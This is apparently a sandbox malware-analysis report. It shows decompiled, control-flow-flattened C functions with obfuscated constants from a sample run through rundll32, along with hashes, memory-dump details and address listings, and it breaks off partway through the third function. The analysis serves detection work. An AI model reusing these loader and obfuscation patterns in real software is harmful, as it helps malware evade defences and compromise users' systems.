                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #?$8$V$aIg$qM
                                                                                                                      • API String ID: 0-1946175224
                                                                                                                      • Opcode ID: f7f5139b07b5e6a3583f21572b60be1714bd0a0bfc8c78602d4ddd1a77782fa5
                                                                                                                      • Instruction ID: 4468493bcbeab28ce6c6b7310c7851af456f56d5cd09d1798f5335d287f3a152
                                                                                                                      • Opcode Fuzzy Hash: f7f5139b07b5e6a3583f21572b60be1714bd0a0bfc8c78602d4ddd1a77782fa5
                                                                                                                      • Instruction Fuzzy Hash: 54E11D714083809FD369CF65C48AA5BFBF1FBC4758F20891DE6AA86260D7B58949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00360867 Relevance: 6.5, Strings: 5, Instructions: 256COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00360867(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _t261;
				intOrPtr* _t266;
				intOrPtr _t273;
				intOrPtr _t274;
				intOrPtr _t275;
				intOrPtr _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				intOrPtr _t314;
				void* _t316;
				intOrPtr _t317;
				intOrPtr _t318;
				intOrPtr _t319;
				signed int* _t320;

				_t275 = __ecx;
				_t320 =  &_v116;
				_v12 = __edx;
				_v28 = __ecx;
				_v8 = 0x8dec59;
				_v4 = 0;
				_v84 = 0xe165d;
				_v84 = _v84 << 7;
				_v84 = _v84 + 0xc1b7;
				_v84 = _v84 ^ 0xc80f2461;
				_v84 = _v84 ^ 0xcf04d456;
				_v32 = 0x655f30;
				_v32 = _v32 + 0x312d;
				_v32 = _v32 ^ 0x0065b82f;
				_v56 = 0xcafed0;
				_v24 = 0;
				_t316 = 0x75256fb;
				_t307 = 0x74;
				_v56 = _v56 / _t307;
				_v56 = _v56 | 0x8b781090;
				_v56 = _v56 ^ 0x8b7ff779;
				_v96 = 0xabe325;
				_v96 = _v96 << 0xd;
				_v96 = _v96 ^ 0xcbcb3531;
				_v96 = _v96 | 0x09a083b5;
				_v96 = _v96 ^ 0xbfa5786a;
				_v76 = 0x7b9c0a;
				_t308 = 0x1c;
				_v76 = _v76 / _t308;
				_v76 = _v76 + 0xffff76d9;
				_v76 = _v76 ^ 0x00066890;
				_v80 = 0xfad268;
				_v80 = _v80 << 0x10;
				_v80 = _v80 ^ 0x68dc041b;
				_v80 = _v80 ^ 0xbab50c4e;
				_v112 = 0x5717c0;
				_v112 = _v112 + 0xd318;
				_v112 = _v112 + 0xffff9813;
				_v112 = _v112 ^ 0x80b72014;
				_v112 = _v112 ^ 0x80e33bd1;
				_v116 = 0x9f285d;
				_v116 = _v116 >> 9;
				_v116 = _v116 + 0xffff6359;
				_v116 = _v116 + 0x4b40;
				_v116 = _v116 ^ 0xfffb57cb;
				_v104 = 0x80a8a2;
				_t309 = 0x29;
				_v104 = _v104 * 0x2c;
				_v104 = _v104 | 0xf3fc02bd;
				_v104 = _v104 * 0x46;
				_v104 = _v104 ^ 0xcf237eb9;
				_v72 = 0x5bfbbd;
				_v72 = _v72 | 0xd3d7b19d;
				_v72 = _v72 << 0xe;
				_v72 = _v72 ^ 0xfee9d95e;
				_v108 = 0xd9b2ce;
				_v108 = _v108 << 0xf;
				_v108 = _v108 + 0xffff979e;
				_v108 = _v108 << 2;
				_v108 = _v108 ^ 0x6594627e;
				_v40 = 0xeed128;
				_v40 = _v40 * 0x34;
				_v40 = _v40 ^ 0x3088f647;
				_v68 = 0x4ae85e;
				_v68 = _v68 / _t309;
				_t310 = 0x35;
				_t319 = _v12;
				_v68 = _v68 * 0x53;
				_v68 = _v68 ^ 0x009a12ab;
				_v60 = 0xe58ccf;
				_v60 = _v60 / _t310;
				_v60 = _v60 >> 9;
				_v60 = _v60 ^ 0x00082ee6;
				_v100 = 0x896781;
				_v100 = _v100 ^ 0xb532ffdf;
				_t311 = 0x3d;
				_v100 = _v100 / _t311;
				_v100 = _v100 >> 0x10;
				_v100 = _v100 ^ 0x0003daf8;
				_v64 = 0xd8c0ce;
				_v64 = _v64 + 0xffffaca0;
				_v64 = _v64 << 0xc;
				_v64 = _v64 ^ 0x86dd78e3;
				_v36 = 0xf932ba;
				_t312 = 0x7f;
				_v36 = _v36 * 0x58;
				_v36 = _v36 ^ 0x55a76b7b;
				_v88 = 0x9f6659;
				_v88 = _v88 / _t312;
				_v88 = _v88 | 0x1ff6fbbf;
				_v88 = _v88 ^ 0xc9c88694;
				_v88 = _v88 ^ 0xd6316d06;
				_v48 = 0x252418;
				_v48 = _v48 ^ 0x008304c1;
				_v48 = _v48 + 0xffff4e21;
				_v48 = _v48 ^ 0x00a4a0c7;
				_v92 = 0xdb5076;
				_v92 = _v92 + 0xffff1b85;
				_v92 = _v92 | 0x2d9bcef8;
				_t313 = 0x68;
				_v92 = _v92 / _t313;
				_v92 = _v92 ^ 0x0076c4f2;
				_v52 = 0x242151;
				_v52 = _v52 | 0x94ee4ace;
				_v52 = _v52 + 0xf8ef;
				_v52 = _v52 ^ 0x94e81f3d;
				_t314 = _v4;
				_t274 = _v8;
				L1:
				while(1) {
					do {
						while(_t316 != 0x1075595) {
							if(_t316 == 0x75256fb) {
								_t316 = 0x1075595;
								continue;
							} else {
								if(_t316 != 0xe0f16ec) {
									goto L15;
								} else {
									_t281 = E0034840B(_v76,  &_v20, _v80, _t275, _v112, _t319, _v116, _t261);
									_t320 =  &(_t320[6]);
									_v24 = _t281;
									if(_t281 == 0) {
										_t317 = _v24;
										L20:
										E003468DE(_v88, _v48, _v92, _v52, _t274);
									} else {
										_t282 = _v20;
										if(_t282 == 0) {
											goto L16;
										} else {
											_v44 = _v44 + _t282;
											_t319 = _t319 - _t282;
											if(_t319 != 0) {
												L9:
												_t261 = _v44;
												L10:
												_t275 = _v28;
												_t316 = 0xe0f16ec;
												continue;
											} else {
												_t283 = _t314 + _t314;
												_push(_t283);
												_push(_t283);
												_v16 = _t283;
												_t318 = E00353512(_t283);
												if(_t318 == 0) {
													goto L16;
												} else {
													E0035FD29(_t274, _v40, _t318, _v68, _t314);
													E003468DE(_v60, _v100, _v64, _v36, _t274);
													_t319 = _t314;
													_t273 = _t318 + _t314;
													_t314 = _v16;
													_t320 =  &(_t320[6]);
													_v44 = _t273;
													_t274 = _t318;
													if(_t319 == 0) {
														goto L16;
													} else {
														goto L9;
													}
												}
											}
										}
									}
								}
							}
							L18:
							return _t317;
						}
						_t314 = 0x10000;
						_push(_t275);
						_push(_t275);
						_t261 = E00353512(0x10000);
						_t274 = _t261;
						if(_t274 == 0) {
							_t275 = _v28;
							_t316 = 0x6559491;
							goto L15;
						} else {
							_v44 = _t261;
							_t319 = 0x10000;
							goto L10;
						}
						goto L18;
						L15:
						_t261 = _v44;
					} while (_t316 != 0x6559491);
					L16:
					_t317 = _v24;
					if(_t317 == 0) {
						goto L20;
					} else {
						_t266 = _v12;
						 *_t266 = _t274;
						 *((intOrPtr*)(_t266 + 4)) = _t314 - _t319;
					}
					goto L18;
				}
			}





















































                                                                                                                      0x00360867
                                                                                                                      0x00360867
                                                                                                                      0x0036086e
                                                                                                                      0x00360872
                                                                                                                      0x00360876
                                                                                                                      0x00360880
                                                                                                                      0x00360887
                                                                                                                      0x0036088f
                                                                                                                      0x00360894
                                                                                                                      0x0036089c
                                                                                                                      0x003608a4
                                                                                                                      0x003608ac
                                                                                                                      0x003608b4
                                                                                                                      0x003608bc
                                                                                                                      0x003608c4
                                                                                                                      0x003608cc
                                                                                                                      0x003608d0
                                                                                                                      0x003608dd
                                                                                                                      0x003608e2
                                                                                                                      0x003608e8
                                                                                                                      0x003608f0
                                                                                                                      0x003608f8
                                                                                                                      0x00360900
                                                                                                                      0x00360905
                                                                                                                      0x0036090d
                                                                                                                      0x00360915
                                                                                                                      0x0036091d
                                                                                                                      0x00360929
                                                                                                                      0x0036092e
                                                                                                                      0x00360932
                                                                                                                      0x0036093a
                                                                                                                      0x00360942
                                                                                                                      0x0036094a
                                                                                                                      0x0036094f
                                                                                                                      0x00360957
                                                                                                                      0x0036095f
                                                                                                                      0x00360967
                                                                                                                      0x0036096f
                                                                                                                      0x00360977
                                                                                                                      0x0036097f
                                                                                                                      0x00360987
                                                                                                                      0x0036098f
                                                                                                                      0x00360994
                                                                                                                      0x0036099c
                                                                                                                      0x003609a4
                                                                                                                      0x003609ac
                                                                                                                      0x003609b9
                                                                                                                      0x003609ba
                                                                                                                      0x003609be
                                                                                                                      0x003609cb
                                                                                                                      0x003609cf
                                                                                                                      0x003609d7
                                                                                                                      0x003609df
                                                                                                                      0x003609e7
                                                                                                                      0x003609ec
                                                                                                                      0x003609f4
                                                                                                                      0x003609fc
                                                                                                                      0x00360a01
                                                                                                                      0x00360a09
                                                                                                                      0x00360a0e
                                                                                                                      0x00360a16
                                                                                                                      0x00360a23
                                                                                                                      0x00360a27
                                                                                                                      0x00360a31
                                                                                                                      0x00360a41
                                                                                                                      0x00360a4c
                                                                                                                      0x00360a4f
                                                                                                                      0x00360a53
                                                                                                                      0x00360a57
                                                                                                                      0x00360a5f
                                                                                                                      0x00360a6f
                                                                                                                      0x00360a73
                                                                                                                      0x00360a78
                                                                                                                      0x00360a80
                                                                                                                      0x00360a88
                                                                                                                      0x00360a94
                                                                                                                      0x00360a99
                                                                                                                      0x00360a9f
                                                                                                                      0x00360aa4
                                                                                                                      0x00360aac
                                                                                                                      0x00360ab4
                                                                                                                      0x00360abc
                                                                                                                      0x00360ac1
                                                                                                                      0x00360ac9
                                                                                                                      0x00360ad6
                                                                                                                      0x00360ad9
                                                                                                                      0x00360add
                                                                                                                      0x00360ae5
                                                                                                                      0x00360af5
                                                                                                                      0x00360af9
                                                                                                                      0x00360b01
                                                                                                                      0x00360b09
                                                                                                                      0x00360b11
                                                                                                                      0x00360b19
                                                                                                                      0x00360b21
                                                                                                                      0x00360b29
                                                                                                                      0x00360b31
                                                                                                                      0x00360b39
                                                                                                                      0x00360b41
                                                                                                                      0x00360b4d
                                                                                                                      0x00360b50
                                                                                                                      0x00360b54
                                                                                                                      0x00360b60
                                                                                                                      0x00360b68
                                                                                                                      0x00360b70
                                                                                                                      0x00360b78
                                                                                                                      0x00360b80
                                                                                                                      0x00360b87
                                                                                                                      0x00000000
                                                                                                                      0x00360b8b
                                                                                                                      0x00360b8b
                                                                                                                      0x00360b8b
                                                                                                                      0x00360b9d
                                                                                                                      0x00360c68
                                                                                                                      0x00000000
                                                                                                                      0x00360ba3
                                                                                                                      0x00360ba9
                                                                                                                      0x00000000
                                                                                                                      0x00360baf
                                                                                                                      0x00360bcb
                                                                                                                      0x00360bcd
                                                                                                                      0x00360bd0
                                                                                                                      0x00360bd6
                                                                                                                      0x00360cd2
                                                                                                                      0x00360cd6
                                                                                                                      0x00360ce7
                                                                                                                      0x00360bdc
                                                                                                                      0x00360bdc
                                                                                                                      0x00360be2
                                                                                                                      0x00000000
                                                                                                                      0x00360be8
                                                                                                                      0x00360be8
                                                                                                                      0x00360bec
                                                                                                                      0x00360bee
                                                                                                                      0x00360c56
                                                                                                                      0x00360c56
                                                                                                                      0x00360c5a
                                                                                                                      0x00360c5a
                                                                                                                      0x00360c5e
                                                                                                                      0x00000000
                                                                                                                      0x00360bf0
                                                                                                                      0x00360bf4
                                                                                                                      0x00360bff
                                                                                                                      0x00360c00
                                                                                                                      0x00360c01
                                                                                                                      0x00360c0a
                                                                                                                      0x00360c10
                                                                                                                      0x00000000
                                                                                                                      0x00360c16
                                                                                                                      0x00360c22
                                                                                                                      0x00360c38
                                                                                                                      0x00360c3d
                                                                                                                      0x00360c3f
                                                                                                                      0x00360c42
                                                                                                                      0x00360c49
                                                                                                                      0x00360c4c
                                                                                                                      0x00360c50
                                                                                                                      0x00360c54
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00360c54
                                                                                                                      0x00360c10
                                                                                                                      0x00360bee
                                                                                                                      0x00360be2
                                                                                                                      0x00360bd6
                                                                                                                      0x00360ba9
                                                                                                                      0x00360cc9
                                                                                                                      0x00360cd1
                                                                                                                      0x00360cd1
                                                                                                                      0x00360c76
                                                                                                                      0x00360c83
                                                                                                                      0x00360c84
                                                                                                                      0x00360c87
                                                                                                                      0x00360c8c
                                                                                                                      0x00360c92
                                                                                                                      0x00360c9c
                                                                                                                      0x00360ca0
                                                                                                                      0x00000000
                                                                                                                      0x00360c94
                                                                                                                      0x00360c94
                                                                                                                      0x00360c98
                                                                                                                      0x00000000
                                                                                                                      0x00360c98
                                                                                                                      0x00000000
                                                                                                                      0x00360ca5
                                                                                                                      0x00360ca5
                                                                                                                      0x00360ca9
                                                                                                                      0x00360cb5
                                                                                                                      0x00360cb5
                                                                                                                      0x00360cbb
                                                                                                                      0x00000000
                                                                                                                      0x00360cbd
                                                                                                                      0x00360cbd
                                                                                                                      0x00360cc3
                                                                                                                      0x00360cc5
                                                                                                                      0x00360cc5
                                                                                                                      0x00000000
                                                                                                                      0x00360cbb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -1$0_e$@K$Q!$$^J
                                                                                                                      • API String ID: 0-785566946
                                                                                                                      • Opcode ID: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction ID: 5aa570b501ca4a85ecf714c4ee311e3ff986c6fe15b0cdb9d25364c093252c82
                                                                                                                      • Opcode Fuzzy Hash: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction Fuzzy Hash: E9C1FFB15083819FC358DF69C48A80BFBE1FBC5794F508A1DF5A69A220D3B1D949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00350946 Relevance: 6.5, Strings: 5, Instructions: 215COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E00350946(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _t226;
				signed int _t228;
				void* _t231;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				void* _t263;
				void* _t264;
				signed int _t265;
				signed int* _t267;
				signed int* _t268;

				_t267 =  &_v88;
				_v4 = _v4 & 0x00000000;
				_v8 = 0xb66c37;
				_v72 = 0xb73c2;
				_v72 = _v72 << 4;
				_v72 = _v72 | 0x07739320;
				_v72 = _v72 << 9;
				_v72 = _v72 ^ 0xef7952b0;
				_v28 = 0x2a4560;
				_v28 = _v28 + 0x8659;
				_v28 = _v28 ^ 0x002a9629;
				_v76 = 0x8c4def;
				_t263 = __edx;
				_t231 = __ecx;
				_t264 = 0xd46e588;
				_t233 = 0x74;
				_v76 = _v76 / _t233;
				_t234 = 0x6c;
				_v76 = _v76 * 3;
				_v76 = _v76 >> 5;
				_v76 = _v76 ^ 0x000c6890;
				_v80 = 0x921d05;
				_v80 = _v80 + 0xffff1131;
				_v80 = _v80 / _t234;
				_v80 = _v80 + 0xffff8087;
				_v80 = _v80 ^ 0x0007528b;
				_v20 = 0x474e9c;
				_t235 = 0xb;
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x0a4b2981;
				_v44 = 0x41d7a6;
				_v44 = _v44 >> 4;
				_v44 = _v44 + 0xffffa7bd;
				_v44 = _v44 ^ 0x00093433;
				_v68 = 0x96e6ad;
				_v68 = _v68 * 0xe;
				_v68 = _v68 + 0x1201;
				_v68 = _v68 >> 9;
				_v68 = _v68 ^ 0x000fa369;
				_v24 = 0xe45c66;
				_t66 =  &_v24; // 0xe45c66
				_v24 =  *_t66 / _t235;
				_v24 = _v24 ^ 0x001eca74;
				_v12 = 0xe2325f;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x003de0fa;
				_v40 = 0xdcdb46;
				_v40 = _v40 + 0xfb03;
				_v40 = _v40 + 0xffff4ab2;
				_v40 = _v40 ^ 0x00d010f5;
				_v16 = 0xf0578c;
				_t236 = 0x25;
				_v16 = _v16 * 0x2d;
				_v16 = _v16 ^ 0x2a381d62;
				_v60 = 0xf0efbe;
				_v60 = _v60 / _t236;
				_t265 = 0x18;
				_v60 = _v60 / _t265;
				_v60 = _v60 + 0xffffc994;
				_v60 = _v60 ^ 0x00051ba1;
				_v64 = 0xfb78a0;
				_v64 = _v64 << 9;
				_t237 = 0x41;
				_v64 = _v64 / _t237;
				_v64 = _v64 | 0xcaafab65;
				_v64 = _v64 ^ 0xcbeb608b;
				_v84 = 0xb70797;
				_v84 = _v84 ^ 0x7f243ece;
				_v84 = _v84 | 0x19416b2b;
				_v84 = _v84 ^ 0xcf7db733;
				_v84 = _v84 ^ 0xb0a40cc8;
				_v88 = 0xcdb2b9;
				_v88 = _v88 + 0x7ca0;
				_v88 = _v88 + 0xffff4266;
				_v88 = _v88 / _t265;
				_v88 = _v88 ^ 0x000ad15f;
				_v32 = 0x3f4742;
				_v32 = _v32 + 0xffff8438;
				_v32 = _v32 ^ 0x00328def;
				_v48 = 0xe7fa35;
				_v48 = _v48 | 0x5473134a;
				_v48 = _v48 + 0x6bf3;
				_v48 = _v48 ^ 0x54f160bb;
				_v36 = 0x82f06;
				_v36 = _v36 >> 1;
				_v36 = _v36 * 0x4f;
				_v36 = _v36 ^ 0x0140909c;
				_v52 = 0x77cd37;
				_v52 = _v52 << 0xb;
				_v52 = _v52 ^ 0x0f05aaad;
				_v52 = _v52 * 0x5b;
				_v52 = _v52 ^ 0x116d7cbe;
				_v56 = 0x6cb0a3;
				_v56 = _v56 + 0xab46;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 + 0x7715;
				_v56 = _v56 ^ 0x0001d55a;
				do {
					while(_t264 != 0x8d90b87) {
						if(_t264 == 0x991fac7) {
							return E0034F88A(_v36, _v52, _v56,  *(_t263 + 0x30));
						}
						if(_t264 == 0xa3f1429) {
							_push(_t237);
							_t228 = E00358D71(_v72, _v28, __eflags, _v76, _v80, _t231);
							_t268 =  &(_t267[4]);
							 *(_t263 + 0x30) = _t228;
							__eflags = _t228;
							if(_t228 != 0) {
								E0034EE05(_v44, _v68, _v24, _t228, _t228);
								_t237 =  *(_t263 + 0x30);
								E0035E713(_t237, _v12, _v40, _v16);
								_t267 =  &(_t268[6]);
								_t264 = 0x8d90b87;
								continue;
							}
						} else {
							if(_t264 == 0xd46e588) {
								_t264 = 0xa3f1429;
								continue;
							} else {
								if(_t264 != 0xf9322b8) {
									goto L14;
								} else {
									_t237 = E00346ED6;
									_t228 = E00354EFF(E00346ED6, _v84, E00346ED6, E00346ED6, _v88, _v32, E00346ED6, _v48, _t263);
									_t267 =  &(_t267[8]);
									 *(_t263 + 0x24) = _t228;
									if(_t228 == 0) {
										_t264 = 0x991fac7;
										continue;
									}
								}
							}
						}
						return _t228;
						L18:
					}
					_t237 = _v60;
					_t226 = E00352BDE(_t237,  *(_t263 + 0x30), _v64);
					_t267 =  &(_t267[1]);
					 *(_t263 + 0xc) = _t226;
					__eflags = _t226;
					if(__eflags == 0) {
						_t264 = 0x991fac7;
						goto L14;
					} else {
						_t264 = 0xf9322b8;
						continue;
					}
					goto L18;
					L14:
					__eflags = _t264 - 0x74fce14;
				} while (__eflags != 0);
				return _t228;
			}






































                                                                                                                      0x00350946
                                                                                                                      0x00350949
                                                                                                                      0x0035094e
                                                                                                                      0x00350956
                                                                                                                      0x0035095e
                                                                                                                      0x00350963
                                                                                                                      0x0035096b
                                                                                                                      0x00350970
                                                                                                                      0x00350978
                                                                                                                      0x00350980
                                                                                                                      0x00350988
                                                                                                                      0x00350990
                                                                                                                      0x003509a0
                                                                                                                      0x003509a2
                                                                                                                      0x003509a8
                                                                                                                      0x003509ad
                                                                                                                      0x003509b2
                                                                                                                      0x003509bd
                                                                                                                      0x003509c0
                                                                                                                      0x003509c4
                                                                                                                      0x003509c9
                                                                                                                      0x003509d1
                                                                                                                      0x003509d9
                                                                                                                      0x003509e9
                                                                                                                      0x003509ed
                                                                                                                      0x003509f5
                                                                                                                      0x003509fd
                                                                                                                      0x00350a0a
                                                                                                                      0x00350a0d
                                                                                                                      0x00350a11
                                                                                                                      0x00350a19
                                                                                                                      0x00350a21
                                                                                                                      0x00350a26
                                                                                                                      0x00350a2e
                                                                                                                      0x00350a36
                                                                                                                      0x00350a43
                                                                                                                      0x00350a47
                                                                                                                      0x00350a4f
                                                                                                                      0x00350a54
                                                                                                                      0x00350a5c
                                                                                                                      0x00350a64
                                                                                                                      0x00350a6c
                                                                                                                      0x00350a70
                                                                                                                      0x00350a78
                                                                                                                      0x00350a80
                                                                                                                      0x00350a85
                                                                                                                      0x00350a8d
                                                                                                                      0x00350a95
                                                                                                                      0x00350a9d
                                                                                                                      0x00350aa5
                                                                                                                      0x00350aad
                                                                                                                      0x00350aba
                                                                                                                      0x00350abd
                                                                                                                      0x00350ac1
                                                                                                                      0x00350ac9
                                                                                                                      0x00350ad9
                                                                                                                      0x00350ae1
                                                                                                                      0x00350ae6
                                                                                                                      0x00350aea
                                                                                                                      0x00350af2
                                                                                                                      0x00350afa
                                                                                                                      0x00350b02
                                                                                                                      0x00350b0d
                                                                                                                      0x00350b12
                                                                                                                      0x00350b16
                                                                                                                      0x00350b1e
                                                                                                                      0x00350b26
                                                                                                                      0x00350b2e
                                                                                                                      0x00350b36
                                                                                                                      0x00350b3e
                                                                                                                      0x00350b46
                                                                                                                      0x00350b4e
                                                                                                                      0x00350b56
                                                                                                                      0x00350b5e
                                                                                                                      0x00350b71
                                                                                                                      0x00350b75
                                                                                                                      0x00350b7d
                                                                                                                      0x00350b85
                                                                                                                      0x00350b8d
                                                                                                                      0x00350b95
                                                                                                                      0x00350b9d
                                                                                                                      0x00350ba5
                                                                                                                      0x00350bad
                                                                                                                      0x00350bb5
                                                                                                                      0x00350bbd
                                                                                                                      0x00350bc6
                                                                                                                      0x00350bca
                                                                                                                      0x00350bd2
                                                                                                                      0x00350bda
                                                                                                                      0x00350bdf
                                                                                                                      0x00350bec
                                                                                                                      0x00350bf0
                                                                                                                      0x00350bf8
                                                                                                                      0x00350c00
                                                                                                                      0x00350c08
                                                                                                                      0x00350c0d
                                                                                                                      0x00350c15
                                                                                                                      0x00350c1d
                                                                                                                      0x00350c1d
                                                                                                                      0x00350c2b
                                                                                                                      0x00000000
                                                                                                                      0x00350d2a
                                                                                                                      0x00350c37
                                                                                                                      0x00350c84
                                                                                                                      0x00350c96
                                                                                                                      0x00350c9b
                                                                                                                      0x00350c9e
                                                                                                                      0x00350ca1
                                                                                                                      0x00350ca3
                                                                                                                      0x00350cbb
                                                                                                                      0x00350ccc
                                                                                                                      0x00350ccf
                                                                                                                      0x00350cd4
                                                                                                                      0x00350cd7
                                                                                                                      0x00000000
                                                                                                                      0x00350cd7
                                                                                                                      0x00350c39
                                                                                                                      0x00350c3f
                                                                                                                      0x00350c7d
                                                                                                                      0x00000000
                                                                                                                      0x00350c41
                                                                                                                      0x00350c47
                                                                                                                      0x00000000
                                                                                                                      0x00350c4d
                                                                                                                      0x00350c61
                                                                                                                      0x00350c66
                                                                                                                      0x00350c6b
                                                                                                                      0x00350c6e
                                                                                                                      0x00350c73
                                                                                                                      0x00350c79
                                                                                                                      0x00000000
                                                                                                                      0x00350c79
                                                                                                                      0x00350c73
                                                                                                                      0x00350c47
                                                                                                                      0x00350c3f
                                                                                                                      0x00350d32
                                                                                                                      0x00000000
                                                                                                                      0x00350d32
                                                                                                                      0x00350ce8
                                                                                                                      0x00350cec
                                                                                                                      0x00350cf1
                                                                                                                      0x00350cf4
                                                                                                                      0x00350cf7
                                                                                                                      0x00350cf9
                                                                                                                      0x00350d05
                                                                                                                      0x00000000
                                                                                                                      0x00350cfb
                                                                                                                      0x00350cfb
                                                                                                                      0x00000000
                                                                                                                      0x00350cfb
                                                                                                                      0x00000000
                                                                                                                      0x00350d07
                                                                                                                      0x00350d07
                                                                                                                      0x00350d07
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 34$BG?$_2$`E*$f\
                                                                                                                      • API String ID: 0-782548322
                                                                                                                      • Opcode ID: 1fbc8c619ac66335679445dd97a2c125a12f0b84f7230f14f8954511ea27947f
                                                                                                                      • Instruction ID: 716ca1448897424735d78434d49faa90cdec4b055149729196bbece6d874356b
                                                                                                                      • Opcode Fuzzy Hash: 1fbc8c619ac66335679445dd97a2c125a12f0b84f7230f14f8954511ea27947f
                                                                                                                      • Instruction Fuzzy Hash: E7A131B29087819FC359CF24C58980BFBF1BBC4758F409A1DF9999A260D7B6D948CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035561F Relevance: 6.4, Strings: 5, Instructions: 189COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E0035561F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t181;
				signed int _t191;
				void* _t203;
				signed int _t204;
				signed int _t205;
				void* _t208;
				signed int _t218;
				intOrPtr* _t219;
				void* _t220;
				signed int* _t223;

				_t219 = _a8;
				_push(_t219);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t181);
				_v4 = _v4 & 0x00000000;
				_t223 =  &(( &_v92)[4]);
				_v12 = 0x6615d4;
				_v8 = 0x63ffda;
				_t220 = 0;
				_v28 = 0xf9afd3;
				_t208 = 0x31efc18;
				_v28 = _v28 >> 7;
				_v28 = _v28 ^ 0x0001f35e;
				_v80 = 0xd84a57;
				_v80 = _v80 << 3;
				_t204 = 0x18;
				_v80 = _v80 * 0x2a;
				_v80 = _v80 + 0x45cf;
				_v80 = _v80 ^ 0x1be1d7fe;
				_v84 = 0xce5c8a;
				_v84 = _v84 + 0xa551;
				_v84 = _v84 * 0x57;
				_v84 = _v84 | 0xfd3f873a;
				_v84 = _v84 ^ 0xff78090e;
				_v52 = 0xb08f91;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 + 0xb2fa;
				_v52 = _v52 ^ 0x000b6173;
				_v56 = 0x674ce5;
				_v56 = _v56 + 0x398f;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 ^ 0x0001bfbd;
				_v88 = 0x67105a;
				_v88 = _v88 * 0x51;
				_v88 = _v88 ^ 0xbb721b0a;
				_v88 = _v88 ^ 0x493680b5;
				_v88 = _v88 ^ 0xd2dd6d54;
				_v60 = 0x6eef31;
				_v60 = _v60 << 6;
